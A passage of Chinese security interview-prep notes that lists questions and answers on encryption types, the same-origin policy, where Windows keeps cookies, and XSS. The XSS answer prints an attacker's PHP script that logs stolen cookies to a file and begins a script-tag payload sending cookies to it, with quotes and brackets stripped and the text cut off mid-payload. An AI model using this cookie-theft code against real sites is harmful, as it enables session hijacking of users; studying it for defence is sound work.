本篇文章主要涉及一下几个方面:
对称加密非对称加密?什么是同源策略?cookie存在哪里?可以打开吗xss如何盗取cookie?tcp、udp的区别及tcp三次握手,syn攻击?证书要考哪些?DVWA是如何搭建的?渗透测试的流程是什么xss如何防御IIS服务器应该做哪些方面的保护措施:虚拟机的几种连接方式及原理xss有cookie一定可以无用户名密码登录吗?对称加密非对称加密?对称加密:加解密用同一密钥,密钥维护复杂n(n-1)/2,不适合互联网传输密钥,加解密效率高。应用于加密数据。非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互联网传输公钥,但是加密效率低,应用于数字签名及加密。
什么是同源策略?
为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的内容进行隔离。浏览器不允许任何旧有脚本访问一个站点的cookie,否则,会话容易被劫持。
只有发布cookie的站点能够访问这些cookie,只有通过该站点返回的页面所包含或加载的JavaScript才能访问cookie。
cookie存在哪里?可以打开吗
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到cookies文件夹。
xss如何盗取cookie?
攻击者代码:
?php$cookie=$_GET[cookie];$time=date(Y-m-dg:i:s);$referer=getenv(HTTP_REFERER);$cookietxt=fopen(cookie.txt,a);fwrite($cookietxt,time:.$time.cookie:.$cookie.referer:.$referer.);注意双引号,容易出错fclose($cookietxt);?脚本端:
scriptdocument.write(imgsrc=